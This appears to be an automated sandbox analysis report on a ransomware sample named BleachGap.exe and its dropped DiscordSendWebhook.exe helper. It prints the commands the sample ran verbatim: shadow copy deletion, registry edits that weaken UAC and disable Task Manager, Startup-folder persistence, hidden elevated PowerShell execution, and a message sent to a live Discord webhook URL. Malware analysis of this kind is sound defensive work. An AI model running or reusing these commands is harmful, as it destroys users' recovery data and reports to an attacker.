Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AF200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	34_2_001AF200
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AF35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	34_2_001AF35D
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001AF65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	34_2_001AF65E
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001A3A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	34_2_001A3A2B
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001A3D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	34_2_001A3D4E
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_001ABF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	34_2_001ABF27

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00144AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

34_2_00144AFE

Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.tmp	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\Temp\1C7E.tmp	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Users\user\Desktop\BleachGap.exe	File opened: C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp	Jump to behavior

Source: WMIC.exe, 00000003.00000002.203376983.00000172CA730000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.207106806.00000258A5C60000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.208617602.000001EFEC230000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.209705655.0000028936350000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.212039356.000002567DD80000.00000002.00000001.sdmp, reg.exe, 0000000B.00000002.213145463.000002899B3D0000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.215383215.00000198B6680000.00000002.00000001.sdmp, WMIC.exe, 00000014.00000002.224994083.00000232B7E10000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.231661191.0000021CA2250000.00000002.00000001.sdmp, reg.exe, 00000017.00000002.232736568.00000291A82A0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.235898086.000002154B490000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.237544213.000001F542D00000.00000002.00000001.sdmp, reg.exe, 0000001B.00000002.241410157.000002084F110000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.243237090.0000021C50D20000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: DiscordSendWebhook.exe, 00000022.00000002.250787434.0000000000C17000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: WMIC.exe, 00000003.00000002.203376983.00000172CA730000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.207106806.00000258A5C60000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.208617602.000001EFEC230000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.209705655.0000028936350000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.212039356.000002567DD80000.00000002.00000001.sdmp, reg.exe, 0000000B.00000002.213145463.000002899B3D0000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.215383215.00000198B6680000.00000002.00000001.sdmp, WMIC.exe, 00000014.00000002.224994083.00000232B7E10000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.231661191.0000021CA2250000.00000002.00000001.sdmp, reg.exe, 00000017.00000002.232736568.00000291A82A0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.235898086.000002154B490000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.237544213.000001F542D00000.00000002.00000001.sdmp, reg.exe, 0000001B.00000002.241410157.000002084F110000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.243237090.0000021C50D20000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WMIC.exe, 00000003.00000002.203376983.00000172CA730000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.207106806.00000258A5C60000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.208617602.000001EFEC230000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.209705655.0000028936350000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.212039356.000002567DD80000.00000002.00000001.sdmp, reg.exe, 0000000B.00000002.213145463.000002899B3D0000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.215383215.00000198B6680000.00000002.00000001.sdmp, WMIC.exe, 00000014.00000002.224994083.00000232B7E10000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.231661191.0000021CA2250000.00000002.00000001.sdmp, reg.exe, 00000017.00000002.232736568.00000291A82A0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.235898086.000002154B490000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.237544213.000001F542D00000.00000002.00000001.sdmp, reg.exe, 0000001B.00000002.241410157.000002084F110000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.243237090.0000021C50D20000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WMIC.exe, 00000003.00000002.203376983.00000172CA730000.00000002.00000001.sdmp, reg.exe, 00000007.00000002.207106806.00000258A5C60000.00000002.00000001.sdmp, reg.exe, 00000008.00000002.208617602.000001EFEC230000.00000002.00000001.sdmp, reg.exe, 00000009.00000002.209705655.0000028936350000.00000002.00000001.sdmp, reg.exe, 0000000A.00000002.212039356.000002567DD80000.00000002.00000001.sdmp, reg.exe, 0000000B.00000002.213145463.000002899B3D0000.00000002.00000001.sdmp, reg.exe, 0000000C.00000002.215383215.00000198B6680000.00000002.00000001.sdmp, WMIC.exe, 00000014.00000002.224994083.00000232B7E10000.00000002.00000001.sdmp, reg.exe, 00000016.00000002.231661191.0000021CA2250000.00000002.00000001.sdmp, reg.exe, 00000017.00000002.232736568.00000291A82A0000.00000002.00000001.sdmp, reg.exe, 00000018.00000002.235898086.000002154B490000.00000002.00000001.sdmp, reg.exe, 0000001A.00000002.237544213.000001F542D00000.00000002.00000001.sdmp, reg.exe, 0000001B.00000002.241410157.000002084F110000.00000002.00000001.sdmp, reg.exe, 0000001D.00000002.243237090.0000021C50D20000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Anti Debugging:

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001B41FD BlockInput,

34_2_001B41FD

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00143B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

34_2_00143B4C

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00175CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

34_2_00175CCC

Source: C:\Users\user\Desktop\BleachGap.exe

Code function: 0_2_0040A6F6 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,

0_2_0040A6F6

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001981F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

34_2_001981F7

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	0_2_004098D0
Source: C:\Users\user\Desktop\BleachGap.exe	Code function: 0_2_004098F0 SetUnhandledExceptionFilter,	0_2_004098F0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_004098D0 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,	17_2_004098D0
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Code function: 17_2_004098F0 SetUnhandledExceptionFilter,	17_2_004098F0
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0016A364 SetUnhandledExceptionFilter,	34_2_0016A364
Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe	Code function: 34_2_0016A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_0016A395

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00198C93 LogonUserW,

34_2_00198C93

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00143B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

34_2_00143B4C

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_00144A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

34_2_00144A35

Source: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe

Code function: 34_2_001A4EC9 mouse_event,

34_2_001A4EC9

Source: C:\Users\user\Desktop\BleachGap.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\1C7F.tmp\1C80.bat C:\Users\user\Desktop\BleachGap.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Control Panel\Mouse' /v SwapMouseButtons /t REG_SZ /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\1C7E.tmp\DiscordSendWebhook.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\sysnative\cmd.exe' /c 'C:\Users\user\AppData\Local\Temp\47B4.tmp\47B5.tmp\47B6.bat 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe''	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic shadowcopy delete	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\vssadmin.exe vssadmin delete shadows /all /quiet	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'PromptOnSecureDesktop' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'ConsentPromptBehaviorAdmin' /t REG_DWORD /d '0' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SYSTEM\CurrentControlSet\Control\Keyboard Layout' /v 'Scancode Map' /t REG_BINARY /d '00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000' /f /reg:64	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System' /v 'DisableTaskMgr' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' /v 'EnableLUA' /t REG_DWORD /d '1' /f	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +s +h +a +i 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BleachGap.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\aescrypt.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r +a +s +h +i 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook.exe 'C:\Users\user\AppData\Local\Temp\47B4.tmp\DiscordSendWebhook' -m ':writing_hand: Currently encrypting files... Please wait until the password and fake btc acc are sended' -w https://discord.com/api/webhooks/807704589436452915/jhcjthfZ4SBzzZNBbqZ9xII5kv9CycOOacxLmktf6BQQn-FYteG1I-Ntg02B-4UphE4K	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start -verb runas cmd.exe /ArgumentList '/c kill.bat' /filepath 'C:\Users\user\AppData\Local\Temp' /WindowStyle hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell start -verb runas cmd.exe /ArgumentList '/c kill.bat' /filepath 'C:\Users\user\AppData\Local\Temp' /WindowStyle hidden	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown	Jump to behavior
